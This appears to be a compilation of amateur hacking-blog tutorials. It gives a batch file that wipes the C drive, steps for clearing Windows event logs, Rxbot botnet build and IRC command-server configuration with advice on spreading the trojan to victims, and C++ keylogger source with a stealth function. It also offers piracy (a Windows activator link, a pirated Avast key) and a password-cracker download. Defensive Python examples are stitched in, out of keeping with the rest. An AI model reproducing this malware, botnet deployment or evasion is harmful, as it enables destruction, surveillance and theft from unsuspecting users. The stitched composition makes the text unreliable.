How to Make the virus

How to make the virus?

   1. Open Notepad and copy the code below into it.
@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (the name can be anything, but the .bat extension is required).
   3. Running this file will delete all the contents of the C drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
 
Ethical Hacking

Guide to Ethical Hacking: Tools and Free Tutorial on Ethical Hacking

What is Ethical Hacking?

Computer hacking is a practice with many nuances. Intent, whether benign or malicious, is often in the eyes of the beholder. When examining the root cause of a website hack or application exploit, it pays to follow the money. A hacker will be motivated by whomever or whatever is sponsoring his or her actions. The computer security industry coined the term “ethical hacking” to describe a hacker who benevolently attacks a network or other security system – whether private or public – on behalf of its owners. Ethical hackers are also called white hat hackers, as distinguished from the black-hatted bad guys.
One grey area in ethical hacking is hacktivism, where the hacker detects and reports (but sometimes exploits) security vulnerabilities as a form of social activism. In these cases the motivation isn’t money, but rather to call attention to an issue or injustice the hacker believes merits social change. However, the victim of the hack may not be so receptive to this message. Ethical hacking should always be undertaken with the express advance consent of the targeted organization – as many black hat hackers claim to be ethical hackers when caught.

Why Use Ethical Hacking?

Why pay someone to hack into your own application or website? To expose its vulnerabilities of course. Any law enforcement officer will tell you to prevent crime, think like a criminal. To test a security system, ethical hackers use the same methods as their malicious brethren, but report problems uncovered to their client instead of taking advantage of them. Ethical hacking is commonplace in the Federal government, where the practice initiated in the 1970s, and many large companies today employ white hat teams within their information security practice. Other online and internet slang terms for ethical hackers include “sneakers”, red teams and tiger teams. Computer programmers can even learn ethical hacking techniques from a variety of certification authorities.
In the world of application security, online ethical hacking takes the form of penetration testing. “Pen tests” are performed in as realistic scenarios as possible to ensure that the results accurately mimic what an intruder could potentially achieve. Manual application testing employs human experts – ethical hackers – that attempt to compromise the app and report what they find. Typically a variety of tests are performed, from simple information-gathering exercises to outright attacks that would cause damage if actualized. A full blown ethical hack might even include social engineering techniques such as emailing staff to dupe them into revealing passwords and other account details.

Veracode and Ethical Hacking: Automated Tools to Expose Vulnerabilities

Penetration testing exposes software coding errors and other vulnerabilities that threaten critical data, user accounts and other application functionality. Not all pen tests are performed manually, however. Ethical hackers may employ automated tools such as static analysis and dynamic analysis. Veracode performs both dynamic and static code analysis and finds security vulnerabilities such as malicious code or insufficient encryption that may lead to security breaches. Using Veracode, penetration testers and other ethical hackers can spend more time prioritizing and remediating problems and less time finding them.
Clearing system logs

This tutorial will walk you through clearing the system logs on a Windows computer. The system keeps a log of which programs you opened, which hardware was used, and so on, along with timestamps and a good deal of other information you might not want someone to see. This tutorial assumes you're using a Windows-based PC.
  1. Navigate to Control Panel.
  2. Click Administrative Tools. In Windows 7, this is under System and Security in the Control Panel.
  3. Double-click and open Event Viewer.
  4. In the left pane, you will see all the different things that are logged. Expand these, right-click, and choose Clear Log for each log you want wiped.
Have fun :)
Internet speed boost

This tutorial will show you how to speed up your internet connection; it works on Xbox 360, PS3, Windows, Mac, and UNIX.
http://code.google.com/p/namebench/
Try out namebench. It hunts down the fastest DNS servers available for your computer to use. namebench runs a fair and thorough benchmark using your web browser history, tcpdump output, or standardized datasets in order to provide an individualized recommendation. namebench is completely free and does not modify your system in any way. This project began as a 20% project at Google.
namebench runs on Mac OS X, Windows, and UNIX, and is available with a graphical user interface as well as a command-line interface.
  1. Download namebench from the link above.
  2. Install and run namebench.
  3. Look at the top right of the HTML report; in the box labelled "Recommended configuration (fastest and nearest)", note the top two servers.
  4. Use the first two DNS servers from step 3 with the following guide
Creating a botnet

This tutorial uses mIRC and other tools, which you will need to download. You can find them via Google or through the pirating methods listed in the Misc Hacks section of this app.
Q: What is a botnet?
A: A botnet is where you send a trojan to someone and, when they open it, a bot joins your channel on IRC (secretly; they don't know this). Once done, the computer is referred to as a zombie.
Depending on the source you used, the bot can do several things.
Keylog their computer, take pictures of their screen, turn on their webcam and take pics/movies, harvest CD keys and game keys or even cracks, passwords, AIM screen names, emails; you can also spam, flood, DDoS, ping, packet, yada yada; some have built-in MD5 crackers and clone functions to spam other IRC channels and overrun a channel, and even perform IRC takeovers.
Once again, depending on the bot, it may be able to kill other competitor bots.
Or even kill AV/FW upon startup.
Add itself to the registry.
Open sites.
Open commands.
Cmd,
notepad,
html,
Anything is possible !
There are the infected computers (bots), the attacker, the server, and the slave.
Quote:
while the term botnet can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka bot herder) can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC bots. Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.
Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out low profile DDoS attacks and steal the CD keys for games, he explained. They had a huge weapon and didn't use as much as they could have done, Santorelli told El Reg. The main damage caused in the case is down to the cost of cleaning up infected PCs.
Botnets are being used for Google Adword click fraud, according to security watchers.
Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server.
  1. Download and install Microsoft Visual C++ 6.0 Standard Edition (63.4 MB)
  2. Download and install Service Pack 6
  3. Download and install the Windows SDK
  4. Open up Microsoft Visual C++ Compiler 6.0
  5. Go to Tools > Options and Click the Directories tab
  6. Now, browse to these directories and add them to the list: (Click the dotted box to add) C:PROGRAM FILESMICROSOFT PLATFORM SDK
    C:PROGRAM FILESMICROSOFT PLATFORM SDKBIN
    C:PROGRAM FILESMICROSOFT PLATFORM SDKINCLUDE
    C:PROGRAM FILESMICROSOFRT PLATFORM SDKLIB
  7. Make sure they're in the order above (use the arrows to adjust the order)
  8. Download Rxbot 7.6
  9. Open the Rxbot 7.6 > configs.h folder and edit these lines only: Put in quotations:
    char password[] = Bot_login_pass; // bot password (Ex: monkey)
    char server[] = aenigma.gotd.org; // server (Ex: irc.efnet.net)
    char serverpass[] = ; // server password (not usually needed)
    char channel[] = #botz_channel; // channel that the bot should join
    char chanpass[] = My_channel_pass; // channel password
    Optional:
    char server2[] = ; // backup server
    char channel2[] = ; // backup channel
    char chanpass2[] = ; //Backup channel pass
  10. Make sure Microsoft Visual C++ is open
  11. Select File > Open Workspace
  12. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
  13. Right Click rBot Files and click Build:
  14. rBot.exe will be in the Rxbot 7.6 > Debug folder !!! YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click Protect and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !

How To Increase Your Memory Card Space 1GB To 2GB

Friends, today I am going to tell you about a very interesting trick. Most people use memory cards with mobile phones, cameras and many other devices, and some use small-capacity memory cards with their device. So today I will tell you how to increase your memory card space: you can convert a 1GB memory card to 2GB with the help of free software.

Here are the steps to do it.

 1) First of all we have to make sure that it is a 1GB memory card. This only works on 1GB cards, and only in some rare cases.

2) Now connect your memory card to the PC and back up all your data on it, because we have to format the drive.

3) After backing up, open the Skimedi Fix 2GB Capacity application (Download here).
4) A small window will pop up showing the FIX and Cancel options. You have to browse to the drive where the card is located.
5) After selecting the drive, press FIX and the updating process will follow. It will ask for your confirmation whether you agree to format or not; click Yes.
6) Later it will ask you to replug the device. Just unplug the memory card and put it back. The size of the memory will be increased from 1GB to 2GB; you can see the properties before and after the cracking process.

7) After that you can also check the memory size in the phone, and you can test the size by copying data to it, around 2GB in total.
You can reopen Skimedi Fix and select the drive again, where it shows the size as 1912MB, which is nothing but 2GB.
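Step 7 above suggests testing the new size by copying about 2GB of data to the card. The check a practitioner actually wants is whether every byte written past the original 1GB can be read back intact, because a tool that only rewrites the reported capacity leaves the real flash unchanged. The following is an added example, not Skimedi Fix and not code from this post: it fills a file on the card with chunk-numbered pattern data, reads it back, and reports the first offset where the data no longer matches. The file path, sizes and the `demo()` corruption offset are assumptions chosen for the example; on a real card point it at a file on the mounted drive and pass the advertised capacity (minus some slack for the filesystem).

```python
import hashlib
import os
import tempfile


def chunk_pattern(index, chunk_size):
    """Deterministic filler unique to chunk `index`, so a write that wraps
    around onto an earlier chunk is detected instead of matching by accident."""
    seed = hashlib.sha256(index.to_bytes(8, "big")).digest()
    reps = chunk_size // len(seed) + 1
    return (seed * reps)[:chunk_size]


def write_test_file(path, total_bytes, chunk_size=1 << 20):
    """Fill `path` with `total_bytes` of chunk-indexed pattern data."""
    written = 0
    index = 0
    with open(path, "wb") as f:
        while written < total_bytes:
            n = min(chunk_size, total_bytes - written)
            f.write(chunk_pattern(index, chunk_size)[:n])
            written += n
            index += 1
        f.flush()
        os.fsync(f.fileno())  # make sure the data really reached the device
    return written


def verify_test_file(path, chunk_size=1 << 20):
    """Read the file back. Returns (bytes_read, first_bad_offset); the offset
    is None when every byte matched the pattern that was written."""
    offset = 0
    index = 0
    with open(path, "rb") as f:
        while True:
            data = f.read(chunk_size)
            if not data:
                break
            expected = chunk_pattern(index, chunk_size)[:len(data)]
            if data != expected:
                bad = next(i for i, (a, b) in enumerate(zip(data, expected)) if a != b)
                return offset + len(data), offset + bad
            offset += len(data)
            index += 1
    return offset, None


def usable_capacity(path, claimed_bytes, chunk_size=1 << 20):
    """Write `claimed_bytes` to `path`, read it back and return how many bytes
    survived intact (equal to `claimed_bytes` on an honest card)."""
    write_test_file(path, claimed_bytes, chunk_size)
    total, bad = verify_test_file(path, chunk_size)
    return total if bad is None else bad


def demo(size=3 * 65536 + 100, chunk_size=65536, corrupt_at=70000):
    """Run the check on a temporary file, then flip one byte (constructed
    stand-in for a card that lost data past its real capacity) and check
    again. Returns (intact_bytes_before, first_bad_offset_after)."""
    with tempfile.TemporaryDirectory() as d:
        p = os.path.join(d, "capacity.bin")
        before = usable_capacity(p, size, chunk_size)
        with open(p, "r+b") as f:
            f.seek(corrupt_at)
            b = f.read(1)[0]
            f.seek(corrupt_at)
            f.write(bytes([b ^ 0xFF]))
        _, bad = verify_test_file(p, chunk_size)
        return before, bad


if __name__ == "__main__":
    print("demo (intact before, first bad offset after):", demo())
```

On a card that really holds 1GB, the mismatch offset will sit at or just past the 1GB mark, which is the number to trust rather than the 1912MB shown in the drive properties.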

Windows 7 Activator Free Download 100% Working


Windows 7 is the awesome operating system from Microsoft. But the thing is that they only allow this OS for 30 days. So we need to install the Windows 7 activator.

The Windows 7 activator will activate your Windows in 5 minutes. In Windows 7 there are many more applications like games, the Snipping Tool and much more. Before installing the activator your Windows 7 is as shown in the figure below, which is just the trial version! You can see in the snapshot below that there are 23 days left for activation.


Now for converting your trial version of Windows 7 into a genuine one you need to download the Windows 7 activator (download link provided at the end of the post). After downloading the activator, open that rar file and just double-click on Windows 7 Loader, then press Yes and wait for 2 minutes; after that it will tell you to restart the PC. After restarting your PC, your Windows 7 will be genuine as shown in the figure below. Now your Windows 7 is fully activated.




password:   asifameerbakhsh.pakistan
Download link : http://www.tusfiles.net/qbyrsnfyu61f


Free Avast Antivirus Serial Key Till 2038

Avast Free Antivirus is a full-featured product, with the same antivirus and anti-spyware scanning engine used in our premium products. Version 7.0 provides even faster protection than its predecessor and offers a web-reputation browser extension as well as virtualization technology. Accurate threat updates via avast. CommunityIQ technology ensure worry-free downloading, surfing, social networking, and gaming--for over 170 million registered users (and over 130 million active users).


What's new in this version: Version 7.0.1456 fixes a problem with random opening of the SafeZone and SSL connection issues with SMTP.

Note: Download Avast Antivirus and Apply the key
AVAST KEY FOR REGISTRATION TILL 19/1/2038 :

W6754380R9978A0910-4TZ59467

Download Avast Antivirus

Brutus Password Cracker – Download brutus-aet2.zip AET2


Brutus is one of the fastest, most flexible remote password crackers you can get your hands on, and it's also free. It is available for Windows 9x, NT and 2000; there is no UN*X version available, although it is a possibility at some point in the future. Brutus was first made publicly available in October 1998 and since that time there have been at least 370,000 downloads. Development continues, so new releases will be available in the near future.

Brutus was written originally to check routers etc. for default and common passwords.

Features

Brutus version AET2 is the current release and includes the following authentication types :
  • HTTP (Basic Authentication)
  • HTTP (HTML Form/CGI)
  • POP3
  • FTP
  • SMB
  • Telnet
Other types such as IMAP, NNTP, NetBus etc. are freely downloadable from this site and simply imported into your copy of Brutus. You can create your own types or use other people's.

The current release includes the following functionality :
  • Multi-stage authentication engine
  • 60 simultaneous target connections
  • No username, single username and multiple username modes
  • Password list, combo (user/password) list and configurable brute force modes
  • Highly customisable authentication sequences
  • Load and resume position
  • Import and Export custom authentication types as BAD files seamlessly
  • SOCKS proxy support for all authentication types
  • User and password list generation and manipulation functionality
  • HTML Form interpretation for HTML Form/CGI authentication types
  • Error handling and recovery capability inc. resume after crash/failure.
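The feature list above (password lists, combo lists, multiple-username mode, 60 simultaneous connections) also describes what such a tool looks like from the server side: a burst of failed logins from one source address, cycling through usernames. Below is an added example, not part of the original post and not Brutus code, of the detection logic a defender would run over authentication logs: it parses failed-login lines, slides a time window per source address and flags any source that crosses a failure threshold. The log format (vsftpd-like), the addresses (RFC 5737 documentation ranges) and the threshold are constructed for the example; adapt the regex to your own FTP or web server's log format.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines for this example (not real logs).
SAMPLE_LOG = [
    '2024-01-10 10:00:01 FAIL LOGIN: Client "203.0.113.5" user "admin"',
    '2024-01-10 10:00:02 FAIL LOGIN: Client "203.0.113.5" user "root"',
    '2024-01-10 10:00:02 FAIL LOGIN: Client "203.0.113.5" user "admin"',
    '2024-01-10 10:00:03 FAIL LOGIN: Client "203.0.113.5" user "test"',
    '2024-01-10 10:00:04 FAIL LOGIN: Client "203.0.113.5" user "guest"',
    '2024-01-10 10:00:05 FAIL LOGIN: Client "203.0.113.5" user "ftp"',
    '2024-01-10 10:00:09 FAIL LOGIN: Client "198.51.100.7" user "alice"',
    '2024-01-10 10:00:15 OK LOGIN: Client "198.51.100.7" user "alice"',
    '2024-01-10 10:02:30 FAIL LOGIN: Client "203.0.113.5" user "admin"',
]

# Assumed line layout: "<timestamp> <OK|FAIL> LOGIN: Client "<ip>" user "<name>""
LINE_RE = re.compile(
    r'^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) '
    r'(?P<result>OK|FAIL) LOGIN: Client "(?P<src>[^"]+)" user "(?P<user>[^"]+)"$'
)


def parse_line(line):
    """Return a dict for a recognised log line, or None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S"),
        "result": m.group("result"),
        "src": m.group("src"),
        "user": m.group("user"),
    }


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Return {src: (max_failures_in_any_window, distinct_usernames)} for every
    source that reaches `threshold` failed logins inside a sliding window."""
    failures = defaultdict(list)
    users = defaultdict(set)
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["result"] != "FAIL":
            continue
        failures[ev["src"]].append(ev["ts"])
        users[ev["src"]].add(ev["user"])

    window = timedelta(seconds=window_seconds)
    alerts = {}
    for src, stamps in failures.items():
        stamps.sort()
        best, start = 0, 0
        for end in range(len(stamps)):
            # advance the window start until it spans at most `window`
            while stamps[end] - stamps[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts[src] = (best, len(users[src]))
    return alerts


if __name__ == "__main__":
    for src, (count, names) in detect_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT {src}: {count} failures in one window across {names} usernames")
```

The distinct-username count is the useful second signal: a user mistyping a password hits one account, whereas a combo-list run walks through many. Pair the alert with rate limiting or a lockout on the server side, since 60 parallel connections from one tool will otherwise finish a short list before a human reads the alert.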
You can download it here:

Brutus AET2

Cool Mozilla Hacks | Hacking Mozilla Firefox



1. Browser in browser, and again browser in browser, and so on...


Enter the following string into your Mozilla Firefox address bar and see what happens

chrome://browser/content/browser.xul

I think you entered it just once; now enter it again in the new browser's address bar and keep going. Below is the snapshot of this hack:
(Screenshot: Browser in Browser hack in Mozilla Firefox)

2. Special Effect Scrolling in Mozilla Firefox
You will really love this effect... a little bit irritating but awesome... it's an isoftdl special by Lokesh, aka LoneRusher or Destructive Mind. Just type the text below into the address bar of Mozilla..

chrome://global/content/alerts/alert.xul
3. Display Cookies without any Cookie Manager
You can view cookies directly in Mozilla Firefox just by entering the text below in the address bar..
chrome://browser/content/preferences/cookies.xul
4. Check the history of Mozilla Firefox directly through a URL
Ahhah... an alternate, better way to view history.. Just enter the text below into the address bar to see the history of visited websites....
chrome://browser/content/history/history-panel.xul

5. Display all your bookmarks
We can view our bookmarks directly using the URL below in the address bar..
chrome://browser/content/bookmarks/bookmarksPanel.xul
6. Advanced tab using a URL
You can directly view the Advanced tab in Firefox using the URL below..
chrome://browser/content/preferences/advanced.xul

7. Advanced JavaScript settings:
chrome://browser/content/preferences/advanced-scripts.xul

8. Settings for clearing history, cookies and other stuff..
chrome://browser/content/preferences/sanitize.xul
9. Change or view font settings in Firefox
chrome://browser/content/preferences/fonts.xul

I think you all like these cool tricks or hacks.... If you have any queries, ask me in the form of comments..
How to code Keylogger in C++ Stepwise by HackingLoops


What is a Keylogger?
Keylogger, as the word itself suggests, means logging or capturing keys or keystrokes. Technically, a keylogger is a software tool or program used to capture the keystrokes that a user presses in real time; further processing depends on the nature of the keylogger, whether it is a physical keylogger or a remote keylogger, and the technique of capturing keystrokes is called keylogging. It is really hard to believe, but keylogging is the easiest method of hacking anybody's password; what you need is just a good keylogger, a good crypter and knowledge of how to spread your keylogger program. Thousands of keyloggers are available on the web for free, but it is a real irony that all of them are either detectable by antivirus or the owner has attached a virus to them to hack their users. So obviously we need to be cautious while using freely available keyloggers or cracked versions of paid keyloggers. But why become prey to other hackers when designing a new one of your own is so easy? Most novice hackers, or script kiddies, think that coding a good keylogger is a very tedious and hard task, but believe me, after reading this tutorial it will become an easy task for you to code a keylogger. Today I will teach you the complete inward and outward logic of a keylogger.
I have divided the coding of the keylogger into a few parts to make it easier for Hackingloops users to understand properly, and, if needed, to write your own logic for the different parts if you think my logic is not optimized. So friends, let's start learning how to code a keylogger in C++ step by step. As we all know (explained above), keyloggers capture keystrokes, so there can be several methods of capturing the keys, such as capturing the keyboard API input and output (such keyloggers are called API-based keyloggers) or simply capturing the keys after they are decoded by your OS (the hardware keyboard sends instructions to the OS drivers, which decode every key pressed on the keyboard into useful alphabets). Today I will be teaching you the latter. So let's start, friends..
Note: You can use the Borland C++ compiler or the Code::Blocks C++ compiler for coding this; I usually prefer Dev-C++, i.e. the Borland C++ compiler.
Now open any of your compilers and create a new project, or simply open a text file and name it anything.cpp (i.e. whatever you wish).
So let's start coding:
Step 1 : Declaring header directives to include the standard functions
#include <iostream>
using namespace std;     //used to avoid the compilation errors because of redefinition of variables.
#include <windows.h>
#include<winuser.h>
Right now we only need these three header directives and these are mandatory.
Step 2 : Declaring global calls :
int SaveLogs (int key_stroke, char *file);
void Stealth();  //Declare stealth function to make you keylogger hidden.
Step 3 : Main Function (mandatory; this executes the complete code and the separate functions or classes).
int main()
{
    Stealth();       // This will call the stealth function.
    char i;          // Here we declare 'i' of type 'char'

    while (1)        // Here we say 'while (1)': execute the code forever.
    {
        for (i = 8; i <= 190; i++)
        {
            if (GetAsyncKeyState(i) == -32767)
                SaveLogs(i, "MYLOGS.txt");    // This will send the value of 'i' and "MYLOGS.txt" to our SaveLogs function.
        }
    }
    system("PAUSE"); // Here we say that the system has to wait before exiting.
    return 0;
}

/************************************Separator********/
Step 4 : Writing the key-capturing logic
int SaveLogs(int key_stroke, char *file)   // Here we define our SaveLogs function.
{
    if ((key_stroke == 1) || (key_stroke == 2))
        return 0;

    FILE *OUTPUT_FILE;
    OUTPUT_FILE = fopen(file, "a+");

    cout << key_stroke << endl;

    if (key_stroke == 8)  // The numbers stand for the ASCII value of a character
        fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
    else if (key_stroke == 13)
        fprintf(OUTPUT_FILE, "%s", "\n");
    else if (key_stroke == 32)
        fprintf(OUTPUT_FILE, "%s", " ");
    else if (key_stroke == VK_TAB)
        fprintf(OUTPUT_FILE, "%s", "[TAB]");
    else if (key_stroke == VK_SHIFT)
        fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
    else if (key_stroke == VK_CONTROL)
        fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
    else if (key_stroke == VK_ESCAPE)
        fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
    else if (key_stroke == VK_END)
        fprintf(OUTPUT_FILE, "%s", "[END]");
    else if (key_stroke == VK_HOME)
        fprintf(OUTPUT_FILE, "%s", "[HOME]");
    else if (key_stroke == VK_LEFT)
        fprintf(OUTPUT_FILE, "%s", "[LEFT]");
    else if (key_stroke == VK_UP)
        fprintf(OUTPUT_FILE, "%s", "[UP]");
    else if (key_stroke == VK_RIGHT)
        fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
    else if (key_stroke == VK_DOWN)
        fprintf(OUTPUT_FILE, "%s", "[DOWN]");
    else if (key_stroke == 190 || key_stroke == 110)
        fprintf(OUTPUT_FILE, "%s", ".");
    else
        fprintf(OUTPUT_FILE, "%s", &key_stroke);

    fclose(OUTPUT_FILE);
    return 0;
}
/************************************Separator********/
Step 5 : Stealth function
This part of the code will help you hide your keylogger from the victim and keep the program window hidden.
void Stealth()
{
  HWND Stealth;
  AllocConsole();
  Stealth = FindWindowA("ConsoleWindowClass", NULL);
  ShowWindow(Stealth,0);
}
Step 6 : Email Function
:P i will explain it later...
Now compile your code and that will generate one binary or exe file :P that is your keylogger. And all your logs will
I hope you all have enjoyed the article. Step 6 is not disclosed because I want to explain the difference between a physical keylogger and a remote keylogger. So guys, you might have got by now that this is a physical keylogger: you can only view the data on the same machine on which the binary is running.
If you have any doubts, please ask in the form of comments.

How to trace an Email Sender in Gmail


How to Trace Email received in Gmail:
1. Basic Method (if sent through some website)
This method is applicable for tracing email that is sent through anonymous email or email forging websites. I have already explained earlier about email forging and how to send anonymous emails. If you wish to revise email forging and how to send anonymous and fake emails, visit the articles below:

What is the main motive behind fake emails? Have you guys ever tried to understand? If not, then here are three or four basic reasons why fake or anonymous emails are sent.
1. For phishing purposes: fake page links that are used to hack your email account.
2. For spreading botnets: fake emails with attachments (.php, .jpg, .bmp etc.) that contain bots, meaning self-spreading Trojans that steal your email contacts and email them to hackers.
3. For stealing your personal information or to cheat you (mails like "you won 10000000$, please send us your details to claim").
4. For promoting a product or making it go viral. Most sellers use this trick to promote their companies' products online in the name of email marketing, but that's all fake; they are in need of customers who can buy from them, and some already have bots attached so that the mail is automatically sent to all the emails in your friend list.

Steps to trace Email received in Gmail (very basic method):
1. Log in to your Gmail account.
2. Open the email whose sender details you want to see.
3. Click on Show details.
4. That's all; it will show you all the basic information about the email. The snapshot below explains it better.
(Screenshot: Click on Show details to see basic details)
(Screenshot: Information inside the show details for tracing email)

2. Advanced Method:
The above trick hardly helps you trace the email address. Now let's discuss an advanced way to trace email.
Have you guys ever tried to understand how emails are sent and received? Ahhahah, computer geeks, you might have read in books about how email works, how it's sent and how it's received. If yes, then you surely haven't implemented that in practical life. For new geeks, read this article to know how email really works:

Emails carry a set of message headers. The headers consist of several things like Delivered-To or From, Subject, Received (to or from), Date, MIME version, Content-Type, X-Mailer client, etc.
How to trace email, advanced trick:
1. Go to the email and open it.
2. Now click on the triangle at the top right corner of the email screen as shown below and select "Show original".
(Screenshot: Detailed hack to trace email received in Gmail)

3. Now you will see something like this:
(Screenshot: More detailed inner look of an email in Gmail)
Now see the second "Received: from SecretMythPC [71.142.245.186]". That is the source IP address (the IP address of the system) from which the email has been sent.

Now open any IP address tracing website. For example, I opened http://whatismyipaddress.com/

Now trace the IP address 71.142.245.186 to get the details and location of the sender. You will see something like this in the output:
(Screenshot: His complete location chart)
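The advanced method above comes down to reading the Received headers in the right order and picking the first address that is not an internal one. The following is an added example, not part of the original post: it parses a raw message with Python's standard email module, walks the Received headers from the sender outward (servers prepend Received, so the last header in the file is the earliest hop), and returns the first bracketed address that is not in a private, loopback, link-local or carrier-NAT range. The raw message, host names and addresses are constructed for the example (documentation ranges from RFC 5737); the `is_internal` check uses an explicit range list rather than `ipaddress.is_private` because the latter would also flag those documentation addresses.

```python
import email
import ipaddress
import re

# Constructed raw message for this example (not a real message from the page).
RAW_MESSAGE = b"""\
Delivered-To: victim@example.net
Received: by 10.64.12.3 with SMTP id x1csp123;
        Mon, 12 Mar 2012 09:15:03 -0700 (PDT)
Received: from mail.example.org (mail.example.org. [192.0.2.10])
        by mx.example.net with ESMTPS id z7si445;
        Mon, 12 Mar 2012 09:15:02 -0700 (PDT)
Received: from SecretMythPC ([203.0.113.45])
        by mail.example.org with ESMTPA id k3sm7788;
        Mon, 12 Mar 2012 09:14:58 -0700 (PDT)
From: Someone <someone@example.org>
To: victim@example.net
Subject: test
Date: Mon, 12 Mar 2012 09:14:57 -0700
X-Mailer: Example Mailer 1.0

hello
"""

# Only bracketed addresses are taken: those are the ones the receiving server
# observed on the connection, not the name the client announced in HELO.
BRACKET_IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")

# Ranges that never identify a sender on the internet: RFC 1918, loopback,
# link-local and CGNAT (100.64.0.0/10).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16", "100.64.0.0/10")]


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def received_hops(raw):
    """Return the Received headers oldest-first (closest to the sender first)."""
    msg = email.message_from_bytes(raw)
    hops = []
    for hdr in reversed(msg.get_all("Received", [])):
        text = " ".join(hdr.split())  # unfold continuation lines
        hops.append({"header": text, "ips": BRACKET_IP_RE.findall(text)})
    return hops


def likely_origin(raw):
    """First bracketed, non-internal IP walking from the sender outward.
    Only hops written by servers you trust are reliable: a sender can forge any
    Received line below the first one added by your own provider."""
    for hop in received_hops(raw):
        for ip in hop["ips"]:
            if not is_internal(ip):
                return ip
    return None


if __name__ == "__main__":
    for i, hop in enumerate(received_hops(RAW_MESSAGE)):
        print(i, hop["ips"], hop["header"][:60])
    print("likely origin:", likely_origin(RAW_MESSAGE))
```

When the sender used a webmail service, the earliest hop will be that service's own server rather than the sender's machine; the next step on the page, looking the address up in a geolocation service, then tells you about the provider, not the person.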

Trace Route Tutorial for Hackers


Hello friends, in our previous tutorial we discussed ping sweep; today I will explain trace route, or simply routing, in Windows. I know you all think you know what trace route is, but actually you don't. It is quite different and its use is also quite different. I know you have always tried to understand the output of trace route but have not been able to work out what each line means. So after reading this you will understand everything quite clearly. Today I am writing my WHITE PAPER ON TRACE ROUTE.. So read on..

What is Trace Route?
As the name suggests, trace route means tracing the path, but which path? Whenever a user opens a website in his web browser, for him it opens directly, but have you ever tried to understand what background processing is going on, and how your web browser actually gets to that address? How a website works I will explain some other day, but for now you must know that to reach a web address, our web browser goes over different paths and chooses the best suitable path, the one with the minimum response time.
Trace route is a network-based utility which shows the path over the network between two systems and lists all the intermediate routers on the way to the final destination. For what purpose is trace route used? The main purpose of trace route is to fix network problems. It helps you identify, while connecting to some network, where the connection is actually slowing down, i.e. which intermediate router is responsible.
Technically, trace route is also an ICMP echo based protocol, similar to ping.
But that is only its primary use; what else can we use this for? As I have already told you how to get an IP address, now when you do a trace route with that IP address, what it will show is which service provider the victim is using, i.e. the ISP (Internet service provider). This will help you determine a few basic things like country, state and sometimes deeper information too. Now, how is this going to be helpful for network forensic experts? Suppose you have made a hacking attempt on some bank, government or other security-conscious website: what they do is store the IP address and timestamp of each visitor in their database. What the network forensic expert will do is trace route your IP address and confirm your ISP and your country (the country the ISP belongs to). Then the forensic expert will contact your ISP, provide your IP address and the time, and ask them to provide details of which person that IP was assigned to at that time; that is how they get the complete address of the hacker and catch him red-handed. I hope you got my point about why trace route is so important.

How trace route is done practically?
In Windows, trace route is done by using the tracert command in the command prompt. You can do it in two different ways:
1. To trace route an IP address: this can be of any website, any computer system or any network.
SYNTAX:
tracert IP (like tracert 127.0.0.1)

2. To trace route websites: when you don't know the website's IP address, let trace route translate that address for you.
SYNTAX:
tracert websiteaddress (like tracert www.google.com)

More options:
  -d               Do not resolve addresses to host names
  -h maximum_hops  Maximum number of hops to search for the target system
  -j host-list     Loose source route along host-list
  -w timeout       Wait timeout milliseconds for each reply

Linux trace route has more options available.

Note: you will always get fewer results when you try to trace route a victim's computer system. Ahhahhh, more precisely, you will only get around 3 to 10 entries: three to four when the victim's firewall doesn't alter your trace routing, and more when the firewall blocks ICMP echoes.

Note: If you get asterisks (*) after the first entry then it confirms that the firewall is playing its part and isn't allowing us to trace route the system, but we will still be able to get the ISP address, and with that we can get an overview of the location.

Understanding Trace Route:
Below is a snapshot of normal trace route output for a victim (a normal computer):
(Screenshot: Trace route live practical example.)
Let's start from the very first line:
1. The very first line after the tracert shows the host name and IP address, which it got using a reverse DNS (domain name system) lookup.
2. "Over a maximum of 30 hops": this means that traceroute will only follow the first 30 hops between your system and the victim's system. 30 is a lot; it usually ends in 3 to 15 hops, but sometimes it goes deeper depending on security and no response (as in our first case, when we tried to route to 14.97.26.147).
Note: The timings are round trip times. There are three round trip times, as in ping. The round trip times (or RTTs) tell us how long it took a packet to get from me to that system and back again, called the latency between the two systems. By default, three packets are sent to each system along the route, so we get three RTTs.

